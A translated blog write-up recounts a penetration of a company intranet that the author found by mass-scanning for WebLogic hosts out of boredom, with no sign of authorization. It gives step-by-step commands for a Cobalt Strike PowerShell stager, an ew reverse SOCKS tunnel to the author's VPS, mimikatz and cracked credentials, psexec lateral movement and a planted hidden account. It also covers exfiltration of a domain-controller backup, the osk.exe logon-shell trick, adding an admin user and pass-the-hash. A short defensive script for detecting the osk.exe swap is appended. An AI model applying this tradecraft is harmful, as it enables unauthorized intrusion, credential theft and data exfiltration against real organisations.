
Title: Record a complete intranet penetration experience


The cause of the story is relatively simple, so let’s summarize it in three words: I’m so idle.

Because I mainly wanted to practice on intranets, I used the simplest and crudest method to find a target: I used fofa to batch-scan a wave of weblogic hosts, and found a target before long.

I took a quick look at the machine environment. There was no antivirus (I found out later that there was actually a very niche firewall, but it did not block powershell), and there was an intranet environment.

So here we directly try the Scripted Web Delivery module that comes with CS, which creates a web service for downloading and executing powershell in one click.

Run the powershell you just generated.

CS has come online successfully.

First, let's look at the system information.

From the above, you can see that the server is Windows 2012 and the intranet IP segment is 192.168.200.x.

Then I used Ladon to scan the intranet environment.

There are not many machines in this intranet segment, and you can see that there is a domain environment. Then I ran multi-NIC detection and web detection.

You can see that this intranet has multiple network segments and that a web service is open.

mimikatz only read one user and a password hash.

The password could be cracked on CMD5.

Next is the most exciting part: the MS17-010 scan!

You can see that several machines may have MS17-010, so I planned to open a socks proxy and hit them directly with MSF.

Here I advise everyone to buy servers billed by usage when buying servers. Don't be greedy for a temporary bargain like me: I bought a HK server with only 1M bandwidth. With CS's built-in socks proxy opened, even the local test connection failed, let alone any other operations.

So here I could only temporarily open a pay-as-you-go server and re-open a tunnel using EW. The specific process is as follows:

Drop the ew file on the server you just opened and execute: ew -s rcsocks -l 1900 -e 1200. This configures a forwarding tunnel, meaning proxy requests received on port 1900 are forwarded to the host that reverse-connects on port 1200.

Then upload the ew file to the target machine and execute: ew -s rssocks -d xxx.xxx.xxx.xxx (IP of the server created above) -e 1200. This enables a socks5 service on the target host and reverse-connects it to port 1200 of the relay machine. After execution, you will see an additional line saying the connection is complete.

Then you just need to configure the proxy locally and it's OK.

For Windows programs, you can usually use sockscap to configure the proxy as follows.

Because we want to use kali's MSF in the local virtual machine, kali's proxy configuration is more convenient. First, vim /etc/proxychains.conf and add the proxy at the bottom.

After saving, just prefix the program to be started with proxychains to run it through the proxy.

For example, to run msfconsole through the proxy: proxychains msfconsole

The road to the intranet is always so bumpy. After trying EXPs, changing tools and asking people for help, I confirmed that MS17-010 really could not be exploited here.

Since the shortcut couldn't be taken, I changed course and started with the web.

I tried weak passwords, injection and other things, but even with Google Translate I couldn't understand the site, so even getting into the backend wouldn't have helped. I'd better find other ways.

So further information collection began:

Viewed saved login credentials: none.

Viewed the list of shared computers.

Then I started trying to access each shared computer's C drive.

On the last one, I found that I had accessed it successfully.

Pinging the machine gave the IP 192.168.200.6.

Right-click a beacon to create a listener.

Then use psexec_psh to try to bring the server 192.168.200.6 online.

Online successfully.

Next, collect information on the newly online machine.

No other discoveries.

Next, go back to the starting point and see which machines are in this network segment.

You can see that there are four Linux machines, namely .22, .1, .5 and .11.

At this point we can try a wave of weak passwords.

I can only say my luck was a little short.

I briefly checked the process information and found nothing. Although I had taken down two intranet machines by this point, neither was a domain-joined machine. The other Linux hosts were tested for weak passwords without success, and I was stuck again.

At this point I noticed that the .6 machine I had taken down was named veeam backup. I guessed this might be a backup server with backup files on its hard disk, so I carefully checked the contents of each of its folders.

I can only say that when luck comes, it cannot be stopped.

In a folder on the D drive, a folder called Backup was found, storing backups of three machines.

I quickly looked up the file suffix on Baidu and found it belongs to software called Veeam Backup & Replication, whose function is to make backups for vSphere and others.

In an instant, my thinking became clear: I just needed to install Veeam Backup & Replication locally, pull the full backup package of this DC down to my machine, restore it into a virtual machine, then boot into PE and swap in cmd.exe by renaming it. That way you can call up a system command line at the login screen, then find a way to add an administrator account or modify the administrator account to get in, bring CS online locally, hashdump to read out the stored hashes of the domain users directly, and then bring the DC online directly through PtH.

I did as I said. This backup server had no outbound network access, but it shares a folder with the .21 machine that does. To make things easier, I quietly created a hidden account on the backup server, 7z-compressed the latest DC full backup into a 700M archive, and put it all in the shared folder.

The machine with outbound access only has port 7001 open, so I found the weblogic web path, moved the whole archive from the shared folder into the web path, and downloaded it from the web side. Because the bandwidth of this machine is too low (average speed 200K) and it kept stalling, it finally finished after a long wait.

During this long download, I first downloaded the Veeam Backup & Replication software onto my own machine.

Suddenly I found a very interesting thing: it supports logging in with a local administrator account.

And because it backed up virtual machines with other IPs, I guessed it must have logged into vSphere.

So I hooked up the proxy and checked again. Sure enough, I guessed right. Wuhu, take off! This is equivalent to administrator privileges.

Restoring the downloaded full backup locally is also very simple: just double-click it and the software opens automatically.

Restore completed.

The next step is simple: download Lao Maotao and generate an ISO PE toolbox.

Mount it in the virtual machine and press ESC at power-on.

After entering PE, rename cmd.exe to osk.exe to overwrite the original C:\windows\system32\osk.exe. This way, when you open the on-screen keyboard at the login screen, a command line with SYSTEM permissions pops up.

1049983-20220119230909301-866191501.png

Some problems occurred when adding users directly here.

Finally, after modifying the password of a domain user and adding it to the local administrators group, I successfully entered the system.

When the finally generated exe was launched, the dumb firewall finally started protecting.

A front view of the dumb firewall.

Damn, it's still following me in my local virtual machine? I won't shut you down.

However, closing it requires a password. Forget it, bear with it.

Finally, it came online with the original powershell.

Then the most ceremonial scene.

In the end, you just need to use the hash to bring the DC online and it's all done.

After finishing work, off to bed.

Summary

1. The target system was found through fofa; it uses the weblogic framework, and commands can be executed through weblogic with tools. Here, an Ice Scorpion one-line webshell was uploaded to the target website. It was also found that there was a niche firewall on the target system, and testing showed the firewall did not intercept the ps script.

2. On the VPS, use the Scripted Web Delivery module that comes with CS, which directly creates a web service for downloading and executing powershell in one click. URL path: /a/123; Host address: target system IP; Port: 80; Listener: https; Type: powershell.

3. Execute the powershell, and CS comes online successfully.

4. Query the target system information through CS commands; the target system is win2012 and the target intranet IP is 192.168.200.21.
   shell systeminfo
   shell ipconfig

5. Upload Ladon to the target system through CS and scan the intranet with Ladon; the target has a host with a web service.
   Ladon 192.168.200.1/24 OsScan

6. The user name and password hash were successfully read through mimikatz; the NTLM hash was cracked through CMD5 and came out as P@sssw0rd.

7. Batch MS17-010 scan through Ladon; several systems had the MS17-010 vulnerability.
   Ladon 192.168.200.1/24 MS17010

8. Execute the following command on the public-network VPS to forward the proxy requests received on port 1900 to the host that reverse-connects on port 1200:
   ew -s rcsocks -l 1900 -e 1200

9. Upload ew to the target system through Ice Scorpion and execute the following command to enable a socks5 service on the target host and reverse-connect to port 1200 of the relay machine:
   ew -s rssocks -d xxx.xxx.xxx.xxx (public-network VPS IP) -e 1200

10. On local Windows, use sockscap to configure the socks5 proxy. For MSF on Kali in the local virtual machine, kali's proxy configuration is more convenient: first vim /etc/proxychains.conf and add a socks5 line at the bottom: socks5 <target IP> 1900

11. In kali, to use the proxy, just: proxychains msfconsole. In sockscap, add a browser through the socks5 proxy for intranet web access; but testing weak passwords found no way in.

12. Continue collecting information: view saved login credentials, nothing there.
   shell cmdkey /l

13. View the list of shared computers and try to access each computer's C drive; the backup computer's share was accessible.
   shell net view \\VEEAM-BACKUP\$

14. Ping the target shared computer; its IP address is 192.168.200.6.
   ping VEEAM-BACKUP

15. Create a listener on CS to relay: listen, name (c2), payload (windows/beacon_reverse_tcp), listen host: 192.168.200.21, listen port: 4444.

16. Then use psexec_psh to bring 192.168.200.6 online, which succeeded. At first nothing was found on the host.
   jump psexec_psh 192.168.200.6

17. The earlier Ladon detection showed that hosts .22, .1, .5 and .11 in the intranet were Linux systems. Weak passwords were tried; 192.168.200.22 had a weak password, and no usable ssh was found on the other Linux hosts.
   192.168.200.22 root 123456

18. A Backup folder was found on the VEEAM-BACKUP host storing backups of three machines. It belongs to Veeam Backup & Replication, whose function is to make backups for vSphere and others.

19. VEEAM-BACKUP has no outbound network access. Here 7z was used to package and compress the Backup folder, and it was copied through the share into the web directory on the target system.

20. Install Backup & Replication locally and restore the backup file. The login window has the default username, password and IP; this requires logging in from inside the target intranet. Here, with a socks4 proxy enabled and Backup & Replication loaded through Proxifier locally, the login succeeded.

21. Restoring the downloaded full backup locally is also very simple: install the software, double-click the backup, and the software opens automatically for restoration.

22. Enter the system through Lao Maotao's Win PE. Here, rename cmd.exe to osk.exe to overwrite the original C:\windows\system32\osk.exe. This way, when the on-screen keyboard is opened, a SYSTEM-permission command line pops up.

23. Through command query, the restored system was found to be a normal domain host. Here, the domain user was added to the local administrators group with the following commands, and the system was entered successfully.
   net user hanli quer1345@ /add
   net localgroup administrators hanli /add

24. The virtual machine came online through the CS backdoor, the hashes were read through CS's hashdump, and the hash was passed to the DC.

Original link: https://xz.aliyun.com/t/9374
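The osk.exe swap used above (cmd.exe renamed over C:\windows\system32\osk.exe so that the on-screen keyboard at the logon screen launches a SYSTEM shell) leaves a simple artifact a defender can look for: an accessibility helper whose bytes are identical to cmd.exe or powershell.exe. The script below is an added example, not code from the original post or from any tool it mentions. It hashes the accessibility helpers in a System32 directory and flags any that match a shell binary. So that it runs offline on any OS, it builds a constructed fake System32 directory with sample bytes; the binary list and the directory are the example's own assumptions, and on a real host you would point it at C:\Windows\System32.

```python
"""
Detect an accessibility-feature swap (e.g. cmd.exe copied over osk.exe).
Added example, not from the original post. Sample directory contents are
constructed; on a real host pass C:\\Windows\\System32 instead.
"""
import hashlib
import tempfile
from pathlib import Path

# Accessibility helpers that Windows can launch from the logon screen as SYSTEM.
# Any of these being a byte-for-byte copy of a shell is the classic hijack.
ACCESSIBILITY_BINARIES = (
    "osk.exe", "sethc.exe", "utilman.exe", "narrator.exe",
    "magnify.exe", "displayswitch.exe", "atbroker.exe",
)
# Shells an attacker typically renames over the helpers (assumed list).
SHELL_BINARIES = ("cmd.exe", "powershell.exe")


def sha256_of(path):
    """Return the SHA-256 hex digest of a file, reading it in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def find_swapped_accessibility_binaries(system32):
    """
    Return a list of (accessibility_binary, shell_it_matches) for every
    accessibility helper whose contents equal one of the shell binaries.
    A missing directory or missing files simply yield no findings.
    """
    system32 = Path(system32)
    shell_hashes = {}
    for name in SHELL_BINARIES:
        candidate = system32 / name
        if candidate.is_file():
            shell_hashes[sha256_of(candidate)] = name

    findings = []
    for name in ACCESSIBILITY_BINARIES:
        candidate = system32 / name
        if not candidate.is_file():
            continue
        digest = sha256_of(candidate)
        if digest in shell_hashes:
            findings.append((name, shell_hashes[digest]))
    return findings


def build_sample_system32(swapped=True):
    """
    Construct a throwaway fake System32 directory (sample data, not real PE
    images). With swapped=True, osk.exe carries the same bytes as cmd.exe,
    reproducing the rename trick; with swapped=False every file is distinct.
    """
    root = Path(tempfile.mkdtemp(prefix="fake_system32_"))
    cmd_image = b"MZ-constructed-cmd-image"
    (root / "cmd.exe").write_bytes(cmd_image)
    (root / "powershell.exe").write_bytes(b"MZ-constructed-powershell-image")
    (root / "sethc.exe").write_bytes(b"MZ-constructed-sethc-image")  # untouched
    osk_image = cmd_image if swapped else b"MZ-constructed-osk-image"
    (root / "osk.exe").write_bytes(osk_image)
    return root


if __name__ == "__main__":
    sample = build_sample_system32(swapped=True)
    for helper, shell in find_swapped_accessibility_binaries(sample):
        print(f"ALERT: {helper} is a copy of {shell} in {sample}")
```

Hash equality catches exactly the rename trick in the post. A fuller check on a real host would also compare each helper against a known-good baseline hash and inspect the Image File Execution Options Debugger values for the same helper names, since the same technique family can be achieved through that registry path without touching the files at all.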
